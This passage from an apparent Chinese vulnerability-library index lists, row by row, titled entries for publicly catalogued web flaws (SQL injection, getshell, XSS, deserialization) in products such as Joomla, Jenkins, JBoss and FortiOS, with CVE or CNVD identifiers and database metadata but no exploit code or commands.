| 291  | Web安全 | Finecms                        | {'id': 7005, 'name': 'Finecms v5.0.10 sql注入漏洞', 'pid': 47, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7005, 'title': None}                                                                        |
| 292  | Web安全 | Finecms                        | {'id': 7006, 'name': 'Finecms v5.0.10 会员中心sql注入漏洞', 'pid': 47, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7006, 'title': None}                                                                    |
| 293  | Web安全 | Finecms                        | {'id': 5742, 'name': '（CVE-2018-6893）Finecms v5.2.0 SQL注入漏洞', 'pid': 47, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5742, 'title': None}                                                          |
| 294  | Web安全 | Finecms                        | {'id': 5743, 'name': '（CVE-2018-18191）Finecms v5.4 存在CSRF漏洞', 'pid': 47, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5743, 'title': None}                                                          |
| 295  | Web安全 | FineReport                     | {'id': 7361, 'name': 'FineReport v5.1 后台getshell', 'pid': 274, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7361, 'title': None}                                                                    |
| 296  | Web安全 | FineReport                     | {'id': 6570, 'name': 'FineReport v8.0 后台getshell', 'pid': 274, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6570, 'title': None}                                                                    |
| 297  | Web安全 | FineReport                     | {'id': 6569, 'name': 'FineReport v8.0 - 9.0 任意文件读取漏洞', 'pid': 274, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6569, 'title': None}                                                                |
| 298  | Web安全 | FlameCMS                       | {'id': 7370, 'name': '（CVE-2019-16309）FlameCMS v3.35 后台sql注入漏洞', 'pid': 490, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7370, 'title': None}                                                      |
| 299  | Web安全 | Fortinet FortiOS               | {'id': 5745, 'name': '（CVE-2018-13379）Fortinet FortiOS 路径遍历漏洞', 'pid': 49, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5745, 'title': None}                                                        |
| 300  | Web安全 | Fortinet FortiOS               | {'id': 5746, 'name': '（CVE-2018-13380）Fortinet FortiOS xss漏洞', 'pid': 49, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5746, 'title': None}                                                         |
| 301  | Web安全 | Fortinet FortiOS               | {'id': 5747, 'name': '（CVE-2018-13381）Fortinet FortiOS 缓冲区错误漏洞', 'pid': 49, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5747, 'title': None}                                                       |
| 302  | Web安全 | Fortinet FortiOS               | {'id': 5748, 'name': '（CVE-2018-13382）Fortinet FortiOS magic后门', 'pid': 49, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5748, 'title': None}                                                       |
| 303  | Web安全 | Fortinet FortiOS               | {'id': 5749, 'name': '（CVE-2018-13383）Fortinet FortiOS 缓冲区错误漏洞', 'pid': 49, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5749, 'title': None}                                                       |
| 304  | Web安全 | FUEL cms                       | {'id': 7389, 'name': '（CNVD-2020-73473）FUEL cms v1.4.8 sql注入漏洞', 'pid': 497, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7389, 'title': None}                                                      |
| 305  | Web安全 | GetSimple CMS                  | {'id': 5750, 'name': '（CVE-2019-11231）GetSimple CMS远程命令执行', 'pid': 50, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5750, 'title': None}                                                            |
| 306  | Web安全 | GhostScript                    | {'id': 5751, 'name': '（CVE-2018-16509）GhostScript 沙箱绕过（命令执行）漏洞', 'pid': 51, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5751, 'title': None}                                                       |
| 307  | Web安全 | GhostScript                    | {'id': 5752, 'name': '（CVE-2018-19475）GhostScript 沙箱绕过（命令执行）漏洞', 'pid': 51, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5752, 'title': None}                                                       |
| 308  | Web安全 | GhostScript                    | {'id': 5753, 'name': '（CVE-2019-6116）GhostScript 沙箱绕过（命令执行）漏洞', 'pid': 51, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5753, 'title': None}                                                        |
| 309  | Web安全 | Git LFS                        | {'id': 7409, 'name': '（CVE-2020-27955）Git LFS 远程命令执行漏洞', 'pid': 505, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7409, 'title': None}                                                              |
| 310  | Web安全 | GIT-SHELL                      | {'id': 6482, 'name': '（CVE-2017-8386）GIT-SHELL 沙盒绕过', 'pid': 259, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6482, 'title': None}                                                                 |
| 311  | Web安全 | Gitbook                        | {'id': 5754, 'name': '（CVE-2017-15688）Gitbook 任意文件读取', 'pid': 52, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5754, 'title': None}                                                                 |
| 312  | Web安全 | Gitbook                        | {'id': 5755, 'name': '（CVE-2019-19596）Gitbook 储存型xss', 'pid': 52, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5755, 'title': None}                                                                 |
| 313  | Web安全 | Gitea                          | {'id': 6483, 'name': 'Gitea 1.4.0 目录穿越导致命令执行漏洞', 'pid': 260, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6483, 'title': None}                                                                      |
| 314  | Web安全 | Gitlab                         | {'id': 5756, 'name': 'Gitlab wiki 储存型xss', 'pid': 53, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5756, 'title': None}                                                                             |
| 315  | Web安全 | Gitlab                         | {'id': 6484, 'name': '（CVE-2016-9086）Gitlab 任意文件读取漏洞', 'pid': 53, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6484, 'title': None}                                                                 |
| 316  | Web安全 | Gitlab                         | {'id': 6547, 'name': '（CVE-2020-10977）Gitlab 任意文件读取漏洞', 'pid': 53, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6547, 'title': None}                                                                |
| 317  | Web安全 | Gitlist                        | {'id': 6485, 'name': 'Gitlist 0.6.0 远程命令执行漏洞', 'pid': 261, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6485, 'title': None}                                                                        |
| 318  | Web安全 | GlassFish                      | {'id': 6486, 'name': 'GlassFish 任意文件读取漏洞', 'pid': 262, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6486, 'title': None}                                                                            |
| 319  | Web安全 | GoAhead                        | {'id': 5757, 'name': ' （CVE-2019-5096） GoAhead远程代码溢出漏洞 ', 'pid': 54, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5757, 'title': None}                                                              |
| 320  | Web安全 | GoAhead                        | {'id': 6487, 'name': '（CVE-2017-17562）GoAhead 远程命令执行漏洞', 'pid': 54, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6487, 'title': None}                                                               |
| 321  | Web安全 | Gogs                           | {'id': 6488, 'name': '（CVE-2018-18925）Gogs 任意用户登录漏洞', 'pid': 263, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6488, 'title': None}                                                                 |
| 322  | Web安全 | Google                         | {'id': 5758, 'name': '（CVE-2019-5786）Chrome 远程代码执行漏洞', 'pid': 55, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5758, 'title': None}                                                                 |
| 323  | Web安全 | Google                         | {'id': 5759, 'name': '（CVE-2020-6404）Google Chrome Blink 缓冲区错误漏洞', 'pid': 55, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5759, 'title': None}                                                     |
| 324  | Web安全 | Google                         | {'id': 5760, 'name': '（CVE-2020-6418）Chrome 远程代码执行漏洞', 'pid': 55, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5760, 'title': None}                                                                 |
| 325  | Web安全 | Hadoop                         | {'id': 5761, 'name': 'Hadoop未授权访问', 'pid': 56, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5761, 'title': None}                                                                                    |
| 326  | Web安全 | Harbor                         | {'id': 5762, 'name': '（CVE-2019-16097）Harbor未授权创建管理员漏洞', 'pid': 57, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5762, 'title': None}                                                               |
| 327  | Web安全 | Hashbrown CMS                  | {'id': 5763, 'name': '（CVE-2020-6948）HashBrown CMS 远程命令执行漏洞', 'pid': 58, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5763, 'title': None}                                                          |
| 328  | Web安全 | Hashbrown CMS                  | {'id': 5764, 'name': '（CVE-2020-6949）HashBrown CMS postUser 函数存在提权漏洞', 'pid': 58, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5764, 'title': None}                                                 |
| 329  | Web安全 | Heybbs                         | {'id': 7078, 'name': 'Heybbs v1.2 sql注入漏洞', 'pid': 391, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7078, 'title': None}                                                                           |
| 330  | Web安全 | Hfs                            | {'id': 5765, 'name': 'Hfs 远程命令执行漏洞', 'pid': 59, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5765, 'title': None}                                                                                   |
| 331  | Web安全 | Horde Groupware Webmail        | {'id': 7125, 'name': 'Horde Groupware Webmail 远程命令执行漏洞', 'pid': 407, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7125, 'title': None}                                                              |
| 332  | Web安全 | Hongcms                        | {'id': 7371, 'name': 'Hongcms v3.0.0 后台sql注入漏洞', 'pid': 491, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7371, 'title': None}                                                                      |
| 333  | Web安全 | IIS                            | {'id': 5766, 'name': '（CVE-2017-7269）IIS 6.0开启Webdav 缓存区溢出漏洞', 'pid': 60, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5766, 'title': None}                                                         |
| 334  | Web安全 | Icms                           | {'id': 7346, 'name': 'Icms v7.0.7 search.admincp.php 页面存在sql注入漏洞', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7346, 'title': None}                                                    |
| 335  | Web安全 | Icms                           | {'id': 7353, 'name': 'Icms v7.0.7 keywords.admincp.php 页面存在sql注入漏洞', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7353, 'title': None}                                                  |
| 336  | Web安全 | Icms                           | {'id': 7354, 'name': 'Icms v7.0.7 apps.admincp.php 页面存在sql注入漏洞', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7354, 'title': None}                                                      |
| 337  | Web安全 | Icms                           | {'id': 7349, 'name': '（CVE-2019-7160）Icms v7.0.13 后台getshell', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7349, 'title': None}                                                        |
| 338  | Web安全 | Icms                           | {'id': 7352, 'name': '（CNVD-2019-08479）Icms v7.0.14 后台do\_query函数sql注入漏洞', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7352, 'title': None}                                            |
| 339  | Web安全 | Icms                           | {'id': 7348, 'name': '（CNVD-2019-09079）Icms v7.0.14 后台sql注入漏洞', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7348, 'title': None}                                                       |
| 340  | Web安全 | Icms                           | {'id': 7351, 'name': '（CNVD-2019-09591）Icms v7.0.14 spider\_rule.admincp.php 存在报错sql注入漏洞', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7351, 'title': None}                            |
| 341  | Web安全 | Icms                           | {'id': 7347, 'name': '（CNVD-2019-10126）Icms v7.0.14 前台储存型xss漏洞', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7347, 'title': None}                                                      |
| 342  | Web安全 | Icms                           | {'id': 7350, 'name': '（CVE-2020-24739）Icms v7.0.15 csrf 漏洞', 'pid': 485, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7350, 'title': None}                                                          |
| 343  | Web安全 | ImageMagick                    | {'id': 5767, 'name': '（CVE-2016-3714）ImageMagick 命令执行漏洞', 'pid': 61, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5767, 'title': None}                                                              |
| 344  | Web安全 | Imcat                          | {'id': 5768, 'name': ' Imcatcms v4.2 后台文件包含getshell ', 'pid': 62, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5768, 'title': None}                                                                 |
| 345  | Web安全 | Imcat                          | {'id': 5769, 'name': '（CVE-2018-20605）Imcat v4.4 任意代码执行漏洞 ', 'pid': 62, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5769, 'title': None}                                                           |
| 346  | Web安全 | Imcat                          | {'id': 5770, 'name': ' （CVE-2018-20606）Imcat v4.4 敏感信息泄露 ', 'pid': 62, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5770, 'title': None}                                                            |
| 347  | Web安全 | Imcat                          | {'id': 5771, 'name': ' （CVE-2018-20607）Imcat v4.4 敏感信息泄露 ', 'pid': 62, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5771, 'title': None}                                                            |
| 348  | Web安全 | Imcat                          | {'id': 5772, 'name': ' （CVE-2018-20608）Imcat v4.4 敏感信息泄露 ', 'pid': 62, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5772, 'title': None}                                                            |
| 349  | Web安全 | Imcat                          | {'id': 5773, 'name': ' （CVE-2018-20609）Imcat v4.4 敏感信息泄露 ', 'pid': 62, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5773, 'title': None}                                                            |
| 350  | Web安全 | Imcat                          | {'id': 5774, 'name': ' （CVE-2018-20610）Imcat v4.4 敏感信息泄露 ', 'pid': 62, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5774, 'title': None}                                                            |
| 351  | Web安全 | Imcat                          | {'id': 5775, 'name': ' （CVE-2018-20611）Imcat v4.4 xss ', 'pid': 62, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5775, 'title': None}                                                               |
| 352  | Web安全 | IonizeCMS                      | {'id': 5776, 'name': '（CVE-2017-5961）IonizeCMS xss', 'pid': 63, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5776, 'title': None}                                                                   |
| 353  | Web安全 | IonizeCMS                      | {'id': 5777, 'name': 'IonizeCMS sql注入', 'pid': 63, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5777, 'title': None}                                                                                |
| 354  | Web安全 | InfluxDB                       | {'id': 7357, 'name': 'InfluxDB 未授权访问漏洞', 'pid': 487, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7357, 'title': None}                                                                              |
| 355  | Web安全 | Jboss                          | {'id': 5778, 'name': 'JBoss JMX Console未授权访问Getshell', 'pid': 65, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5778, 'title': None}                                                                 |
| 356  | Web安全 | Jboss                          | {'id': 5779, 'name': '（CVE-2007-1036）JBoss JMX Console HtmlAdaptor Getshell', 'pid': 65, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5779, 'title': None}                                          |
| 357  | Web安全 | Jboss                          | {'id': 5780, 'name': '（CVE-2010-0738）JBoss JMX控制台安全验证绕过漏洞', 'pid': 65, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5780, 'title': None}                                                            |
| 358  | Web安全 | Jboss                          | {'id': 5781, 'name': 'JBoss Administration Console 弱口令 Getshell', 'pid': 65, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5781, 'title': None}                                                      |
| 359  | Web安全 | Jboss                          | {'id': 5782, 'name': '（CVE-2013-4810）JBoss EJBInvokerServle 反序列化漏洞', 'pid': 66, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5782, 'title': None}                                                   |
| 360  | Web安全 | Jboss                          | {'id': 5783, 'name': '（CVE-2015-7501）JBoss JMXInvokerServlet 反序列化漏洞', 'pid': 66, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5783, 'title': None}                                                  |
| 361  | Web安全 | Jboss                          | {'id': 5784, 'name': '（CVE-2017-7504）JBoss 4.x JBossMQ JMS 反序列化漏洞', 'pid': 66, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5784, 'title': None}                                                    |
| 362  | Web安全 | Jboss                          | {'id': 5785, 'name': '（CVE-2017-12149）JBosS AS 6.X 反序列化漏洞', 'pid': 66, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5785, 'title': None}                                                            |
| 363  | Web安全 | Jboss                          | {'id': 7099, 'name': 'JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool', 'pid': 64, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7099, 'title': None} |
| 364  | Web安全 | Internet Explorer              | {'id': 7398, 'name': '（CVE-2020-0674）Internet Explorer 远程代码执行漏洞', 'pid': 500, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7398, 'title': None}                                                     |
| 365  | Web安全 | JDWP                           | {'id': 6705, 'name': 'JDWP 远程代码执行漏洞', 'pid': 306, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6705, 'title': None}                                                                                 |
| 366  | Web安全 | Jenkins                        | {'id': 5786, 'name': 'Jenkins 功能未授权访问导致的远程命令执行漏洞', 'pid': 67, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5786, 'title': None}                                                                     |
| 367  | Web安全 | Jenkins                        | {'id': 6564, 'name': '（CVE-2017-1000353）Jenkins-CI 远程代码执行漏洞', 'pid': 67, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6564, 'title': None}                                                          |
| 368  | Web安全 | Jenkins                        | {'id': 6565, 'name': '（CVE-2018-1000861）Jenkins 远程命令执行漏洞', 'pid': 67, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6565, 'title': None}                                                             |
| 369  | Web安全 | Jenkins                        | {'id': 7291, 'name': '（CVE-2019-10392）Jenkins Git client 插件 <= 2.8.4远程代码执行漏洞', 'pid': 67, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7291, 'title': None}                                         |
| 370  | Web安全 | Jenkins                        | {'id': 7376, 'name': '（CVE-2018-1999002）Jenkins 任意文件读取漏洞', 'pid': 67, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7376, 'title': None}                                                             |
| 371  | Web安全 | Jenkins                        | {'id': 5787, 'name': '（CVE-2019-10475）反射xss', 'pid': 67, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5787, 'title': None}                                                                          |
| 372  | Web安全 | Jenkins                        | {'id': 5788, 'name': '（CVE-2019-1003000）Jenkins 远程代码执行漏洞', 'pid': 67, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5788, 'title': None}                                                             |
| 373  | Web安全 | JfinalCMS                      | {'id': 7380, 'name': 'JfinalCMS 后台任意文件上传漏洞', 'pid': 494, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7380, 'title': None}                                                                          |
| 374  | Web安全 | JfinalCMS                      | {'id': 7381, 'name': 'JfinalCMS 储存型xss漏洞', 'pid': 494, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7381, 'title': None}                                                                            |
| 375  | Web安全 | JfinalCMS                      | {'id': 7382, 'name': 'JfinalCMS SSTI 模板注入漏洞', 'pid': 494, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7382, 'title': None}                                                                         |
| 376  | Web安全 | JeecgBoot                      | {'id': 7302, 'name': 'JeecgBoot 未授权访问漏洞', 'pid': 467, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7302, 'title': None}                                                                             |
| 377  | Web安全 | Jinja2                         | {'id': 5789, 'name': 'Jinja2 SSTI 服务端模版注入攻击', 'pid': 68, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5789, 'title': None}                                                                          |
| 378  | Web安全 | Jizhicms                       | {'id': 6698, 'name': 'Jizhicms 1.7.1 存储XSS漏洞', 'pid': 284, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6698, 'title': None}                                                                        |
| 379  | Web安全 | Jizhicms                       | {'id': 6623, 'name': 'Jizhicms 1.7.1 反射型xss', 'pid': 284, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6623, 'title': None}                                                                         |
| 380  | Web安全 | Jizhicms                       | {'id': 6625, 'name': 'Jizhicms 1.7.1 后台配置文件删除', 'pid': 284, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6625, 'title': None}                                                                       |
| 381  | Web安全 | Jizhicms                       | {'id': 6621, 'name': 'Jizhicms 1.7.1 后台getshell', 'pid': 284, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6621, 'title': None}                                                                     |
| 382  | Web安全 | Jizhicms                       | {'id': 6622, 'name': 'Jizhicms 1.7.1 从sql注入到任意文件上传', 'pid': 284, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6622, 'title': None}                                                                  |
| 383  | Web安全 | Jizhicms                       | {'id': 6624, 'name': 'Jizhicms 1.7.1 后台任意文件夹压缩下载', 'pid': 284, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6624, 'title': None}                                                                    |
| 384  | Web安全 | Jizhicms                       | {'id': 6699, 'name': 'Jizhicms 1.7.1 ./user/release.html sql注入漏洞', 'pid': 284, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6699, 'title': None}                                                    |
| 385  | Web安全 | Jizhicms                       | {'id': 6700, 'name': 'Jizhicms 1.7.1 ./user/userinfo.html sql注入漏洞', 'pid': 284, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6700, 'title': None}                                                   |
| 386  | Web安全 | Jolokia                        | {'id': 5792, 'name': '（CVE-2018-1000130）Jolokia 远程代码执行漏洞', 'pid': 70, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5792, 'title': None}                                                             |
| 387  | Web安全 | Jolokia                        | {'id': 5791, 'name': '（CVE-2018-1000129）Jolokia 反射型xss', 'pid': 70, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5791, 'title': None}                                                               |
| 388  | Web安全 | Joomla                         | {'id': 5793, 'name': 'Joomscan', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5793, 'title': None}                                                                                       |
| 389  | Web安全 | Joomla                         | {'id': 5795, 'name': 'Joomla component GMapFP v3.30 任意文件上传', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5795, 'title': None}                                                           |
| 390  | Web安全 | Joomla                         | {'id': 5794, 'name': 'Joomla v3.0.0 - 3.4.6 远程命令执行漏洞', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5794, 'title': None}                                                                 |
| 391  | Web安全 | Joomla                         | {'id': 5797, 'name': 'Joomla v3.4.6 configuration.php 远程命令执行漏洞', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5797, 'title': None}                                                       |
| 392  | Web安全 | Joomla                         | {'id': 5798, 'name': 'Joomla com\_fabrik v3.9.11 目录遍历漏洞', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5798, 'title': None}                                                              |
| 393  | Web安全 | Joomla                         | {'id': 5800, 'name': "Joomla com\_hdwplayer v4.2 - 'search.php' sql注入漏洞", 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5800, 'title': None}                                              |
| 394  | Web安全 | Joomla                         | {'id': 5796, 'name': '（CVE-2015-8562）Joomla v3.4.5 反序列化漏洞', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5796, 'title': None}                                                            |
| 395  | Web安全 | Joomla                         | {'id': 6962, 'name': '（CVE-2016-8869）Joomla v3.4.4 - 3.6.3 未授权创建特权用户', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6962, 'title': None}                                                 |
| 396  | Web安全 | Joomla                         | {'id': 6567, 'name': '（CVE-2017-8917）Joomla v3.7.0 QL注入漏洞', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6567, 'title': None}                                                            |
| 397  | Web安全 | Joomla                         | {'id': 6735, 'name': '（CVE-2017-14596）Joomla v1.5 <= 3.7.5 LDAP注入绕过登录认证', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6735, 'title': None}                                              |
| 398  | Web安全 | Joomla                         | {'id': 7289, 'name': '（CVE-2018-8045）joomla v3.5.0 - 3.8.5 sql注入漏洞 ', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7289, 'title': None}                                                  |
| 399  | Web安全 | Joomla                         | {'id': 5799, 'name': '（CVE-2020-10238）Joomla <= v3.9.15 远程命令执行漏洞', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5799, 'title': None}                                                     |
| 400  | Web安全 | Joomla                         | {'id': 6494, 'name': '（CVE-2020-11890）Joomla < v3.9.17 远程命令执行漏洞', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6494, 'title': None}                                                      |
| 401  | Web安全 | Joomla                         | {'id': 7116, 'name': '（CVE-2020-25751）Joomla paGO Commerce v2.5.9.0 sql注入漏洞', 'pid': 71, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7116, 'title': None}                                          |
| 402  | Web安全 | Jupyter Notebook               | {'id': 7301, 'name': 'Jupyter Notebook 未授权访问漏洞', 'pid': 466, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7301, 'title': None}                                                                      |
| 403  | Web安全 | JYmusic                        | {'id': 5801, 'name': 'JYmusic 1.x 版本 前台getshell', 'pid': 72, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5801, 'title': None}                                                                      |
| 404  | Web安全 | JYmusic                        | {'id': 5802, 'name': 'JYmusic 2.0 前台XSS漏洞', 'pid': 72, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5802, 'title': None}                                                                            |
| 405  | Web安全 | JYmusic                        | {'id': 5803, 'name': 'JYmusic 2.0 命令执行漏洞', 'pid': 72, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5803, 'title': None}                                                                             |
| 406  | Web安全 | Kibana                         | {'id': 6682, 'name': '（CVE-2018-17246）Kibana Local File Inclusion', 'pid': 73, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6682, 'title': None}                                                    |
| 407  | Web安全 | Kibana                         | {'id': 5804, 'name': '（CVE-2019-7609）Kibana < v6.6.0 未授权远程代码命令执行', 'pid': 73, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5804, 'title': None}                                                     |
| 408  | Web安全 | Kindeditor                     | {'id': 7157, 'name': 'KindEditor 服务器任意文件读取漏洞', 'pid': 74, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7157, 'title': None}                                                                         |
| 409  | Web安全 | Kindeditor                     | {'id': 5805, 'name': '（CVE-2017-1002024）Kindeditor <=4.1.11 上传漏洞', 'pid': 74, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5805, 'title': None}                                                     |
| 410  | Web安全 | Laravel                        | {'id': 5806, 'name': '（CVE-2018-15133）Laravel 反序列化远程命令执行漏洞', 'pid': 75, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5806, 'title': None}                                                           |
| 411  | Web安全 | Laravel                        | {'id': 5807, 'name': '（CVE-2019-9081）Laravel v5.7 反序列化rce', 'pid': 75, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5807, 'title': None}                                                            |
| 412  | Web安全 | LerxCMS                        | {'id': 7067, 'name': 'LerxCMS v6.5 后台ssrf getshell', 'pid': 386, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7067, 'title': None}                                                                  |
| 413  | Web安全 | LFCMS                          | {'id': 6679, 'name': 'LFCMS AjaxController.class.php 前台sql注入漏洞', 'pid': 297, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6679, 'title': None}                                                      |
| 414  | Web安全 | LFCMS                          | {'id': 6678, 'name': 'LFCMS NewsController.class.php 前台sql注入漏洞', 'pid': 297, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6678, 'title': None}                                                      |
| 415  | Web安全 | LFCMS                          | {'id': 6680, 'name': 'LFCMS 后台getshell', 'pid': 297, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6680, 'title': None}                                                                              |
| 416  | Web安全 | LFCMS                          | {'id': 6681, 'name': 'LFCMS 后台任意文件读取漏洞', 'pid': 297, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6681, 'title': None}                                                                              |
| 417  | Web安全 | Libinjection                   | {'id': 7086, 'name': 'Libinjection 语义分析通用绕过', 'pid': 395, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7086, 'title': None}                                                                         |
| 418  | Web安全 | Liferay Portal                 | {'id': 6480, 'name': '（CVE-2020-7961）Liferay Portal Json Web Service 反序列化漏洞', 'pid': 257, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6480, 'title': None}                                         |
| 419  | Web安全 | lmxcms                         | {'id': 7402, 'name': 'lmxcms v1.4 后台任意文件上传漏洞', 'pid': 502, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7402, 'title': None}                                                                        |
| 420  | Web安全 | Libssh                         | {'id': 6683, 'name': '（CVE-2018-10933）Libssh 服务端权限认证绕过漏洞', 'pid': 298, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6683, 'title': None}                                                            |
| 421  | Web安全 | Maccms                         | {'id': 5808, 'name': 'Maccms后门', 'pid': 76, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5808, 'title': None}                                                                                       |
